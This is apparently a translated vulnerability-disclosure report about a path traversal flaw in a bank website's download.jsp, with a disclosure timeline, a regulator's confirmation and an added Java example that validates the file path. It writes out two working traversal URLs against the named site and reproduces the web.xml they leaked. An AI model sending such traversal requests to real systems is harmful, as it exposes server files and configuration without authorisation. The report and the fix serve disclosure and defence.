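2015-01-08: Details reported to the vendor; awaiting vendor handling
2015-01-13: Vendor confirmed; details disclosed to the vendor only
2015-01-23: Details disclosed to core white hats and experts in related fields
2015-02-02: Details disclosed to regular white hats
2015-02-12: Details disclosed to intern white hats
2015-02-22: Details disclosed to the public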
I'm not sure whether this really counts, but I'll submit it anyway.
http://bd-bank.com.cn/download/download.jsp?filepath=../../WEB-INF/WEB.XML
http://bd-bank.com.cn/download/download.jsp?filepath=download/download.jsp
<?xml version="1.0" encoding="UTF-8"?>
<!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by rth77 (rth77) -->
<!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_4.dtd">
<web-app>
  <session-config>
    <session-timeout>5</session-timeout>
  </session-config>
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
    <welcome-file>index.html</welcome-file>
    <welcome-file>index.htm</welcome-file>
  </welcome-file-list>
  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>
  <error-page>
    <error-code>403</error-code>
    <location>/404.html</location>
  </error-page>
  <listener>
    <listener-class>ehm.db.HibernateInitStartUp</listener-class>
  </listener>
  <listener>
    <listener-class>ehm.module.media.fun.MediaListener</listener-class>
  </listener>
  <listener>
    <listener-class>ehm.web.publish.fun.PublishInit</listener-class>
  </listener>
  <listener>
    <listener-class>ehm.module.reptile.fun.ReptileListener</listener-class>
  </listener>
  <servlet>
    <servlet-name>editorUpload</servlet-name>
    <servlet-class>ehm.module.editor.upload.UploadServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>editorUpload</servlet-name>
    <url-pattern>/editorupload</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>editorUpload</servlet-name>
    <url-pattern>/site067/editorupload</url-pattern>
  </servlet-mapping>
  <context-param>
    <param-name>request.charsetencoding</param-name>
    <param-value>ISO-8859-1</param-value>
  </context-param>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>public-resources</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>PUT</http-method>
      <http-method>DELETE</http-method>
      <http-method>HEAD</http-method>
      <http-method>OPTIONS</http-method>
      <http-method>TRACE</http-method>
    </web-resource-collection>
    <auth-constraint></auth-constraint>
  </security-constraint>
  <login-config>
    <auth-method>BASIC</auth-method>
  </login-config>
</web-app>
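Severity: Medium
Vulnerability Rank: 10
Confirmation time: 2015-01-13 08:32
CNVD confirmed and reproduced the reported behaviour, and has passed it to CNCERT to notify the banking-sector informatization authority, which will coordinate follow-up handling with the site's operator.
None yet.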
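An added example, not part of the original report and not the site's code: one way to validate the `filepath` parameter of a download handler such as `download.jsp` so that both requests shown above are refused. The class name, the dedicated download directory and the extension allow-list are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.*;
import java.util.*;

public class SafeDownloadResolver {
    // Assumption: only these document types are meant to be downloadable.
    private static final Set<String> ALLOWED_EXT =
            new HashSet<>(Arrays.asList("pdf", "doc", "xls", "zip"));
    private final Path baseDir;

    // baseDir should be a dedicated directory outside the web application root,
    // so that WEB-INF and JSP sources are never reachable from it.
    public SafeDownloadResolver(Path baseDir) throws IOException {
        this.baseDir = baseDir.toRealPath();
    }

    /** Returns the file to serve, or empty when the request must be refused. */
    public Optional<Path> resolve(String filepath) {
        if (filepath == null || filepath.isEmpty() || filepath.indexOf('\0') >= 0) return Optional.empty();
        try {
            // Collapse "../" segments, then require the result to stay under baseDir.
            Path candidate = baseDir.resolve(filepath).normalize();
            if (!candidate.startsWith(baseDir)) return Optional.empty();
            Path fileName = candidate.getFileName();
            if (fileName == null) return Optional.empty();
            // Lower-case before comparing: the request in the report used "WEB.XML".
            String name = fileName.toString().toLowerCase(Locale.ROOT);
            int dot = name.lastIndexOf('.');
            if (dot < 0 || !ALLOWED_EXT.contains(name.substring(dot + 1))) return Optional.empty();
            if (!Files.isRegularFile(candidate)) return Optional.empty();
            // Resolve symlinks and re-check containment before serving.
            Path real = candidate.toRealPath();
            return real.startsWith(baseDir) ? Optional.of(real) : Optional.empty();
        } catch (InvalidPathException | IOException e) {
            return Optional.empty();
        }
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("downloads");   // constructed sample directory
        Files.write(base.resolve("form.pdf"), new byte[] {1}); // constructed sample file
        SafeDownloadResolver r = new SafeDownloadResolver(base);
        for (String p : new String[] {"form.pdf", "../../WEB-INF/WEB.XML", "download/download.jsp"}) {
            System.out.println(p + " -> " + (r.resolve(p).isPresent() ? "serve" : "refuse"));
        }
    }
}
```

The traversal request fails the containment check, and the `.jsp` request fails the extension allow-list even though it stays inside the base directory.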